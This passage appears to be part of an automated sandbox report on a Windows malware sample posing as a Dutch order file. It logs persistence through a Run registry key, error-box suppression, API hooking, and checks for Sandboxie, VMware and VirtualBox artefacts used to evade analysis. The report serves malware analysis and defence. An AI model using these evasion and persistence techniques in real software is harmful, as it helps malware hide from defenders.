                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BD895D push 82F4AA0Bh; ret 13_2_04BD8973
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BED2DB push eax; ret 13_2_04BED2E5
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BD82C7 push cs; retf 13_2_04BD82C9
                Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LDSP2VC8Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LDSP2VC8Jump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLP
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAMEP
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory allocated: 1DF34550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory allocated: 1DF4DFC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sysJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sysJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sysJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FD1C0 rdtsc 5_2_032FD1C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8426Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1206Jump to behavior
